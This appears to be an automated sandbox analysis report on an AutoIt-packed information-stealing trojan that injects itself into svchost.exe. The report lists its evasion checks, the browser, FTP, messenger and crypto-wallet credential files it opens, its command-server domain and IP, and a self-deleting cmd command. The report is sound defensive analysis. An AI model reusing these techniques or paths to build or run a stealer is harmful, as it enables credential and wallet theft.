                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00409488 push 004094B8h; ret 2_2_004094B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A4AC push 0041A4E8h; ret 2_2_0041A4E0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004AF98E
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00521C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00521C41
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00417B1A
                Source: C:\Users\user\Desktop\Po#70831.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Po#70831.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96403
                Source: C:\Users\user\Desktop\Po#70831.exeAPI/Special instruction interceptor: Address: 36D3234
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,2_2_00416B94
                Source: C:\Users\user\Desktop\Po#70831.exeAPI coverage: 3.8 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_004FDBBE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004CC2A2 FindFirstFileExW,0_2_004CC2A2
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005068EE FindFirstFileW,FindClose,0_2_005068EE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0050698F
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD076
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD3A9
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00509642
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0050979D
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00509B2B
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00505C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00505C97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,2_2_004098A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D0A0 FindFirstFileW,2_2_0040D0A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00414408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415610 FindFirstFileW,FindNextFileW,FindClose,2_2_00415610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,2_2_004087DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D06E FindFirstFileW,2_2_0040D06E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041303C FindFirstFileW,FindNextFileW,FindClose,2_2_0041303C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040989F FindFirstFileW,FindNextFileW,FindClose,2_2_0040989F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,2_2_004111C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D3C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041158C FindFirstFileW,FindNextFileW,FindClose,2_2_0041158C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411590 FindFirstFileW,FindNextFileW,FindClose,2_2_00411590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,2_2_00412D9C
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004942DE
                Source: svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: svchost.exe, 00000002.00000002.2482899863.000000000325F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NativeFontCtlHyper-V RAWp)
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050EAA2 BlockInput,0_2_0050EAA2
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004C2622
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B4CE8 mov eax, dword ptr fs:[00000030h]0_2_004B4CE8
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_036D3500 mov eax, dword ptr fs:[00000030h]0_2_036D3500
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_036D34A0 mov eax, dword ptr fs:[00000030h]0_2_036D34A0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_036D1E70 mov eax, dword ptr fs:[00000030h]0_2_036D1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407A34 mov eax, dword ptr fs:[00000030h]2_2_00407A34
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_004F0B62
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B083F
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B09D5 SetUnhandledExceptionFilter,0_2_004B09D5
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004B0C21

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.128.117 80
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Po#70831.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D2A008
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004F1201
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004D2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_004D2BA5
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FB226 SendInput,keybd_event,0_2_004FB226
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_005122DA
                Source: C:\Users\user\Desktop\Po#70831.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Po#70831.exe"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_004F0B62
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004F1663
                Source: Po#70831.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Po#70831.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B0698 cpuid 0_2_004B0698
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,2_2_00416FB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,2_2_00404B4C
                Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00508195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00508195
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004ED27A GetUserNameW,0_2_004ED27A
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004CB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_004CB952
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004942DE
                Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2484833657.00000000067AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2483360582.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Po#70831.exe PID: 6900, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4396, type: MEMORYSTR
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
                Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
                Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Exodus Eden\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: Po#70831.exeBinary or memory string: WIN_81
                Source: Po#70831.exeBinary or memory string: WIN_XP
                Source: Po#70831.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Po#70831.exeBinary or memory string: WIN_XPe
                Source: Po#70831.exeBinary or memory string: WIN_VISTA
                Source: Po#70831.exeBinary or memory string: WIN_7
                Source: Po#70831.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 2.2.svchost.exe.60c5e12.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.605a6c1.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.60386d4.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4396, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00511204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00511204
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00511806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00511806
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 2 Obfuscated Files or Information | 2 Credentials in Registry | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 Timestomp | 1 Credentials In Files | 147 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 312 Process Injection | 1 DLL Side-Loading | LSA Secrets | 231 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1501074 Sample: Po#70831.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100
                Top level: ln6b9.shop; Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 10 other signatures
                Po#70831.exe (started): Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
                svchost.exe (started by Po#70831.exe): ln6b9.shop 172.67.128.117, 49717, 49718, 80 CLOUDFLARENETUS United States; dropped C:\Users\user\AppData\...\vcruntime140.dll, PE32; dropped C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32; dropped C:\Users\user\AppData\Local\...\softokn3.dll, PE32; 45 other files (none is malicious) dropped; System process connects to network (likely due to code injection or exploit); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Instant Messenger accounts or passwords; 6 other signatures
                cmd.exe (started by svchost.exe)
                conhost.exe (started by cmd.exe)
                timeout.exe (started by cmd.exe)

                Source | Detection | Scanner | Label | Link
                Po#70831.exe | 33% | Virustotal | | Browse
                Po#70831.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject |
                Po#70831.exe | 100% | Joe Sandbox ML | |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-console-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-datetime-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-debug-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-2-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l2-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-handle-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-heap-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-interlocked-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-localization-l1-2-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-memory-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-1.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-profile-l1-1-0.dll | 0% | Virustotal | | Browse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | Virustotal | | Browse
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                ln6b9.shop | 2% | Virustotal | | Browse
                Source | Detection | Scanner | Label | Link
                http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe |
                http://ocsp.thawte.com0 | 0% | URL Reputation | safe |
                http://ip-api.com/json | 0% | URL Reputation | safe |
